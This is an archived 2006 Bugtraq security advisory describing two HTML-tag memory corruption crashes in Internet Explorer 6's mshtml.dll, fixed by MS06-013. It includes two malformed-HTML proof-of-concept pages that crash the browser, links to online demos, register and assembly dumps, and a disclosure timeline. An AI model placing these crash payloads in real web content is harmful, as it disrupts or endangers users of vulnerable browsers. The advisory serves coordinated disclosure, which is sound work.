Bugtraq mailing list archives
[BuHa-Security] MS06-013: HTML Tag Memory Corruption Vulnerability in MS IE 6 SP2
From: bugtraq () morph3us org
Date: 25 May 2006 22:52:55 -0000
-----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 --------------------------------------------------- | BuHa Security-Advisory #13 | May 25th, 2006 | --------------------------------------------------- | Vendor | MS Internet Explorer 6.0 | | URL | http://www.microsoft.com/windows/ie/ | | Version | <= 6.0.2900.2180.xpsp_sp2 | | Risk | Critical (Memory Corruption) | --------------------------------------------------- The Microsoft Security Response Center rated following issues as critical because, on the face of it, they could produce an exploitable memory corruption (see HTML Tag Memory Corruption Vulnerability - CVE-2006-1188 [1]) with a variant of my PoC. o Description: ============= Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser made by Microsoft and currently available as part of Microsoft Windows. Visit http://www.microsoft.com/windows/ie/default.mspx or http://en.wikipedia.org/wiki/Internet_Explorer for detailed information. o Memory Corruption Vulnerability: <mshtml.dll>#7d519030 ================================= Following HTML code forces IE 6 to crash:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <fieldset> <h4> <pre><td> <menu> <legend> <a> <ul> <small> <fieldset> <h6> </h6 </u> </optgroup> </tr> </map> </ul </dfn> </del> </h2> </dir> </ul>
Online-demo: http://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html These are the register values and the ASM dump at the time of the access violation:
eax=00000000 ebx=0012e88c ecx=00000000 edx=0012e7c0 esi=00000000 edi=00000004 eip=7d519030 esp=0012e780 ebp=0012e894 7d519012 55 push ebp 7d519013 8bec mov ebp,esp 7d519015 8b4104 mov eax,[ecx+0x4] 7d519018 394508 cmp [ebp+0x8],eax 7d51901b 7c09 jl mshtml+0x69026 (7d519026) 7d51901d 7edc jle mshtml+0x68ffb (7d518ffb) 7d51901f 33c0 xor eax,eax 7d519021 40 inc eax 7d519022 5d pop ebp 7d519023 c20800 ret 0x8 7d519026 83c8ff or eax,0xffffffff 7d519029 ebf7 jmp mshtml+0x69022 (7d519022) 7d51902b 90 nop 7d51902c 90 nop 7d51902d 90 nop 7d51902e 90 nop 7d51902f 90 nop FAULT ->7d519030 8b4108 mov eax,[ecx+0x8] ds:0023:00000008=???????? 7d519033 85c0 test eax,eax 7d519035 7425 jz mshtml+0x6905c (7d51905c) 7d519037 8b10 mov edx,[eax] 7d519039 f6c210 test dl,0x10 7d51903c 7408 jz mshtml+0x69046 (7d519046) 7d51903e f6c220 test dl,0x20 7d519041 7519 jnz mshtml+0x6905c (7d51905c) 7d519043 8b400c mov eax,[eax+0xc] 7d519046 8b4808 mov ecx,[eax+0x8] 7d519049 85c9 test ecx,ecx
o Memory Corruption Vulnerability: <mshtml.dll>#7d529d35 ================================= Following HTML code forces IE 6 to crash:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <bdo> </span> <pre> <param> <form> <colgroup> <small> </small> </colgroup> </map> </button> </code <blockquote> <th> <small> </tbody> </tr> </ol> </tbody> </ol> </code> </strong> <head> <fieldset> <style> </style </dir> </a> </td </li> </label </object> </bdo </th </object </q> <ol> <object>
Online-demo: http://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html These are the register values and the ASM dump at the time of the access violation:
eax=00000000 ebx=0012e88c ecx=00000000 edx=00000012 esi=00e7dbb0 edi=00000002 eip=7d529d35 esp=0012e778 ebp=0012e778 7d529d0e e811170000 call mshtml+0x7b424 (7d52b424) 7d529d13 85c0 test eax,eax 7d529d15 0f85c5500800 jne mshtml!DllGetClassObject+0x10fa2 (7d5aede0) 7d529d1b 0fb65508 movzx edx,byte ptr [ebp+0x8] 7d529d1f 8d849680000000 lea eax,[esi+edx*4+0x80] 7d529d26 5e pop esi 7d529d27 5d pop ebp 7d529d28 c20c00 ret 0xc 7d529d2b 90 nop 7d529d2c 90 nop 7d529d2d 90 nop 7d529d2e 90 nop 7d529d2f 90 nop 7d529d30 8bff mov edi,edi 7d529d32 55 push ebp 7d529d33 8bec mov ebp,esp FAULT ->7d529d35 0fbe4114 movsx eax,byte ptr [ecx+0x14] ds:0023:00000014=?? 7d529d39 c1e004 shl eax,0x4 7d529d3c 0578aa4b7d add eax,0x7d4baa78 7d529d41 7410 jz mshtml+0x79d53 (7d529d53) 7d529d43 8b400c mov eax,[eax+0xc] 7d529d46 234508 and eax,[ebp+0x8] 7d529d49 f7d8 neg eax 7d529d4b 1bc0 sbb eax,eax 7d529d4d f7d8 neg eax 7d529d4f 5d pop ebp 7d529d50 c20400 ret 0x4 7d529d53 33c0 xor eax,eax 7d529d55 ebf8 jmp mshtml+0x79d4f (7d529d4f)
o Vulnerable versions: ===================== The DoS vulnerability was successfully tested on:
MS IE 6 SP2 - Win XP Pro SP2 MS IE 6 - Win 2k SP4
o Disclosure Timeline: ===================== xx Feb 06 - Vulnerabilities discovered. 08 Mar 06 - Vendor contacted. 22 Mar 06 - Vendor confirmed vulnerabilities. 25 May 06 - Public release. o Solution: ========== Install the latest security update (MS06-013) for Internet Explorer [2]. o Credits: ========= Thomas Waldegger <bugtraq () morph3us org> BuHa-Security Community - http://buha.info/board/ If you have questions, suggestions or criticism about the advisory feel free to send me a mail. The address 'bugtraq () morph3us org' is more a spam address than a regular mail address therefore it's possible that some mails get ignored. Please use the contact details at http://morph3us.org/ to contact me. Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all members of BuHa. Advisory online: http://morph3us.org/advisories/20060525-msie6-sp2-2.txt [1] http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1188 [2] http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx - -- Don't you feel the power of CSS Layouts? BuHa-Security Community: http://buha.info/board/ -----BEGIN PGP SIGNATURE----- Version: n/a Comment: http://morph3us.org/ iD8DBQFEdjSQkCo6/ctnOpYRA9qlAJ9CfZxTO0qAs+6O12hmutZ6eeHoMwCghkd2 vrVBfqAxWpoJ9Ny1W8OAtEw= =M5nj -----END PGP SIGNATURE-----
Current thread:
- [BuHa-Security] MS06-013: HTML Tag Memory Corruption Vulnerability in MS IE 6 SP2 bugtraq (May 26)